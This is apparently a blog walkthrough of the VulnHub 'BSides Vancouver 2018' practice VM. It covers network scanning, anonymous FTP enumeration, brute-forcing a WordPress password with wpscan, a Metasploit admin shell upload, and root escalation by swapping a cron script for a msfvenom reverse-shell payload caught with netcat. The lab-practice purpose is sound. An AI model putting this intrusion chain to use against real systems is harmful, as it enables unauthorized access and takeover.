Pentesting BSides Vancouver: 2018 Workshop

Pentesting BSides Vancouver: 2018 Workshop

Introduction

A vulnerable Virtual Machine (VM) is intended as practice for penetration testers. This allows for experienced users to hone their craft, while providing a perfect learning ground for those first starting. A VM is perfect for this task, as no permanent damage can be caused, and no traffic leaves the computer lab. This is essential, as wayward network traffic can potentially land you in serious legal trouble. This guide will walk you through how to properly setup a hacking lab, as well as a walkthrough of VM from vulnhub[1].

Objective

The objective of this guide is to get root on a VM known as BSides Vancouver: 2018 (Workshop)[2].  This is achieved when the flag that is hidden on the machine is found. While in some cases there can be multiple flags on the system, BSides only has one.

Setting up the Lab

The first thing we need is a Virtual Player. There are multiple options, and you are free to choose whichever one you like best. I will be using VMWare[3] throughout this exercise. Additionally, we need two VM’s; our attacking machine Kali Linux and our vulnerable VM BSides. All links can be found below. While you can install Kali with simply the default options, I recommend giving Kali 2 cores and at least 2 GB of RAM.

VM Settings

For our vulnerable VM we don’t need that much in the way of resources, so 1GB of RAM with only 1 core is fine.  Make sure that networking is set to NAT. This will make finding the host much easier later.

Getting Shell Access

When you launch the BSides VM you will be presented with a user and login prompt. Your goal is to gain access to this machine. But firstly, we need to find it over the network from Kali. Open a terminal in Kali and type ifconfig.

ifconfig output

This tells us that our network is on 192.168.16. While Kali is 128 in this case, our VM is somewhere else on the network. Thankfully, this is very easy with Nmap. Type: nmap -sS 192.168.16.* (Remember that Linux is case sensitive!). This simple scan will do what is called TCP SYN scan on every host on 192.168.16. A TCP SYN scan is the most popular and preferred method of scanning with Nmap. This is because a SYN scan performs faster compared to other scan types and is less likely to be blocked by firewalls.

Nmap SYN Scan

As we can see Nmap gave us five hosts that are up on the network. We now simply need to figure out which host is our vulnerable VM. Well we know we can get rid of one them right away. 192.168.16.128 is Kali Linux! Remember we know this from the ifconfig command. 192.168.16.1 and 2 looks like DHCP servers.

This leaves 192.168.16.132. We can easily verify this, by opening Firefox and entering the IP. If you are met with this page:

Apache Success

Then you know you identified the correct host, and we can proceed to the next step. It’s now time to enumerate further on host, now that we know the correct IP. Let’s run Nmap again, but this time we will change up the flags. Typing: nmap -p- -A 192.168.16.133 –open quickly gives us a huge insight into our next step. Before I show you the output, lets first break down the command.

  • nmap this launches the Nmap program
  • -p- the “p” stands for ports, normally we can target a single port, or multiple ports, by putting port numbers after the “p”. An example would be -p 22. That argument would only scan port 22. By omitting the beginning and end numbers, we can the whole range (excluding zero)
  • -A This flag launches some of the more powerful aspects of Nmap. Including this flag enables OS detection, version detection, script scanning, and traceroute.
  • –open This flag shows only open ports.

After running this scan, we get a lot of output:

Advanced Nmap Scan

There’s a lot to unpack from this scan, so its time to start jotting down notes. I recommend navigating to Documents, and making a new folder called BSides. In that folder use Leafpad to start jotting down notes. In fact, select all the output from nmap, and copy paste it into Leafpad. Ensure that you save the file as .txt.

Now lets tale a closer look at the output. The first thing we see that we have port 21 open. Port 21 is a File Transfer Protocol (FTP). Moreover, nmap is telling us that there is no password on the FTP server! This can be a potential goldmine. Open Firefox and type ftp:// put the IP address of the VM after it.

FTP Index

We can now traverse the directory! Clicking on public we see what is stored on the server.

FTP Traversed

Click the file, and that gives us 5 usernames:

  • abatchy
  • john
  • mai
  • anne
  • doomguy

This is a potential goldmine, we now have potentially a list of users on the system. Let’s go back to our Nmap scan. On port 80, Nmap reports that it has a webserver, (something we already know since we visited it earlier) and that http-robots.txt has 1 disallowed entry. The robots file has one job, and that job is to tell search engines like Google, don’t index this. That means that this is almost certainly of interest to us. We can see the robots file for ourselves by navigating to 192.168.16.133/robots.txt. After checking it, we can see it only disallows one thing:

User-agent: *

Disallow: /backup_wordpress

This looks very promising. It seems like there is a hidden WordPress website on the server, and WordPress is notorious for its bad security. We can navigate to the WordPress site by typing the IP of the server followed by /backup_wordpress.Depreciated WordPress Blog

As we can see we now have access to the WordPress website. A quick look around shows us that there is one user named john. You may remember john, as he was in our user list that we found earlier on the FTP server. We also see that John is the IT administrator. That makes him our target. Let’s find the WordPress login portal. As this is WordPress, it’s not hard to find. Append wp-login.php to the end of our URL and voila!

Wordpress Login Portal

Our goal now is to try to break into this WordPress site. We already have half the puzzle needed as well. We know John is a user, as well as the system admin. All we need to do is break into his account. We can achieve this by opening a new terminal and typing: wpscan -u http://192.168.16.133/backup_wordpress/ –username john –wordlist /usr/share/wordlists/rockyou.txt. Let’s go over the flags used:

  • wpscan the name of the program used
  • -u the name of the website we are trying to hack, in our case http://192.168.16.133/backup_wordpress/
  • username Rather obvious, we use this flag when we already have a username that we want to brute force, as this is john in this case, we enter john.
  • wordlist This flag sets that we are using a password dictionary to try to break into account. We then follow it up with the directory the dictionary is in. Kali Linux has a bunch of dictionaries built in by default. We use rockyou.txt as it is the largest dictionary we have. Rockyou.txt is a result of a massive data breach of passwords, so we know that people do use these passwords. If you can find your password in the list, I suggest you change it.

 

Let the program run for a bit at this point, and eventually you will break the code! Once wpscan reports that it has an error, you know you just hit the big money. Stop the program by hitting control C and add the password to your notes.

Found Password

Now for the fun part, go back to the WordPress login screen, and enter john for the username, and enigma for the password. You know you are in when you see this on the top left corner of the screen. Howdy John!

Feel free to mess around at this point if you want to. You now have complete control over this WordPress website, and you can make it do whatever you want. Download new plugins, change the homepage, add users, and even change the theme if you want!

When you finish playing around, its time to get a remote shell on the VM. As we successfully hacked WordPress, this part will be a breeze. In a new terminal type: msfconsole. This launches the all power Metasploit. We now must find the proper exploit to use, that will allow us to gain access to the system via our hacked WordPress website. To do this we type: Metasploit Search This will bring up all the exploits that the Metasploit knows of, with a brief description, when the exploit was disclosed, as well as how well it’s ranked to work.  At this point it is easy to get overwhelmed but relax. It’s not so difficult to find the correct exploit for this situation. If you look at the description, most of the exploits are actual means of hacking the WordPress site, something we have already done. Furthermore, we know that we want to get a shell on the system, and we know that we have admin access on the WordPress site. If you look carefully, you will find a description called “WordPress Admin Shell Upload”. This looks perfect, so let’s load it and see what happens. Type “use” to tell Metasploit we want to use this exploit followed by the name of the exploit.Metasploit use exploit

This will change your terminal to look like: Metasploit Exploit Terminal

At this point we need to look at the options that this exploit has, so we can properly give Metasploit the information it needs to break into the system. By typing Show Options we will get the following output.

Metasploit WordPress Admin Shell Exploit

As you can see, we have a bunch of different options we can use, the setting its currently at, if the setting is required for the exploit to work, and a description of the options.  Furthermore, on the bottom it shows what kind of target we are pursuing, and we can see that it is in fact WordPress.

Then Type:   This tells Metasploit that we are attacking this IP. “Set” tells Metasploit that we are assigning a value, which in our case is RHOST; which stands for remote host (our target)

Once again, we are using “set” to assign a value, this time to targeturi, which is needed in our case as we are using a WordPress exploit. Note that its “targeturi” and not “targeturl”. The difference is subtle but an important one. Uniform Resource Locator (URL) refers to the subset of Uniform Resource Identifiers (URI). In our case the URL would be http://192.168.16.133/backup_wordpress/, but Metasploit already knows most of that information when we set the IP address for the remote host earlier.

Tells Metasploit to assign the value john to the user.

Assigns the password we found earlier. Before we launch the exploit, its always nice to review our options to ensure we got our information right. If we mistyped any of the options, the exploit will fail. So, type “show options” again to ensure all our information is correct.

This is the launch command. Once you press enter, Metasploit will do its thing, and all you have to do is watch. Remember that everything that Metasploit is doing here, you can do manually. However, there are certain advantages to using Metasploit, besides the ease of use, and that is the powerful meterpreter.

Once you have this prompt it means your in business! You now have a shell on the target machine! Congrats are certainly in order, although we still have to gain root access before we can capture our flag. Type: This will give us a shell in the VM, if you want to back to the meterpreter shell, type exit. If you want a proper normal shell like you would have in a normal terminal paste this in: python -c ‘import pty; pty.spawn(“/bin/bash”)’

Now you have a proper shell, with the user that you are on the left @ with the host name its left. If you want to go back to the meterpreter shell, you will have to type exit twice. The different types of shells provide different advantages. For example, the meterpreter shell can download and upload files and directories but can’t change permissions on files.

As you can see, you are a user called www-data. While you certainly have some rights, your next goal is to get root access. In the meantime, feel free to explore what you can. Remember you can navigate throughout the VM with cd followed by the folder name you wish to travel to. cd .. will traverse backwards. You can also type cd /foldername/foldername/ if you know the names in advance to traverse multiple folders at once. Type ls to see what is in your directory. ls -l will show hidden files as well. Finally, the cat command will print out what’s inside text documents to the terminal.  For example, if there is an item named secrets.txt, you may want to find out its contents. By typing cat secrets.txt, all text in the document will be displayed in the terminal. Have fun 😊

Gaining Root Access

So now we that we are on the system, it’s time to gain administrative access.  On Linux this means either becoming the root user, becoming a user that has root privileges, or giving root privileges to the user you currently have access to. Once root access is obtained, the system for all intents and purposes belongs to us. At that point there is nowhere we can’t go, or file that we can’t take.

One of things we should always check when we try to obtain root access, is Cron. Cron comes with most Linux distributions, and is a scheduler. People can use Cron to launch programs or other tasks, based a set time or event. More importantly for us, Cron generally runs its scripts and programs as root. This means that if we can get Cron to launch a malicious payload, the payload will have been launched with root access, and thus allow us to gain that access.

To check Cron, we must browse to where the file is located. To this end type: “cd ..” multiple times until we get to the main directory, you will know you are there when “ls” gives you this output:

Once you are here, cd into the etc directory, and view the crontab file by typing “cat crontab”.  This will display the contents of Cron to us. Keep in mind that while we can view Cron, any attempts to modify it will fail. This is because Cron is write protected.

Let’s break down what we are looking at here. Cron uses an interesting method of scheduling. There is a great website called https://crontab.guru/ that can be used to figure out what is going to happen when. If you enter in the value for * * * * *, into the website, you will see that this means it will launch whatever it’s supposed to launch every minute. We see that it runs as user root, and we can see that the command is to launch what looks like a script located in /usr/local/bin. So, let’s look. Navigating to that folder we see that it contains only one item, the script that crontab is running.

Looks like a simple script. Every minute, Cron is going to launch this script will delete everything located in /var/log/apache. This file also has full permissions and is our ticket into the system. So, let’s download it.

Now that we have our file, it’s time to modify it. Kali has all the tools needed to make the perfect payload. You can see a list of all the different types of payloads that we can make by clicking here. In our case we need to make a simple script payload. Fire up a new terminal (Don’t close the meterpreter shell) and type:

Once again let’s go over all the different parts of this command.

  • Msfvenom this is actually part of the Metasploit framework, by typing this first we are specifying that we are launching this program.
  • p this specifies that we are about to name a payload.
  • cmd/unix/reverse_python this is the payload.
  • Lhost=192.168.16.128 lhost stands for local host, and we feed it the local IP of attacker OS Kali. If you forgot what your IP is, type ifconfig into the terminal. This option is very important, as we are encoding the program to open a connection back to us.
  • Lport=1234 lport stands for local port. This field does need to be filled in, but the port you use, does not matter a whole lot. Just write down the name of the port so you don’t forget which number you picked.

Once msfvenom finishes compiling our payload, you will get the following malicious script.

As you can see, there is a python command to launch this code, but not before it gets decoded from base64. If you are curious to see the actual python commands in the script, there are several online base64 decoders available for you. Now let’s add this to the cleanup script.  Click files and open the cleanup that we downloaded earlier. Delete the rm line, paste our payload in instead, and save the file.

Go back to our meterpreter shell and type:

This will upload our new payload file to where Cron will soon launch it for us. Just to be sure type: “cat cleanup” and you will see that our job is nearly done. Open a new shell and type:

  • nc this calls the program netcat
  • -lvp this is three flags that we are merging into one. The l is for listening more, v for verbose, and p specifies the port number that we are listening on, in our case 1234.

At this point you just wait for a Cron to launch the script, and then

We are in. At this point we just need to grab our flag for our win! “ls” and since we are currently in the root directory we will already see the flag.

[1] https://www.vulnhub.com

[2] https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/

[3] https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/14_0

Yisroel Wilner
yisroelwilner@aol.com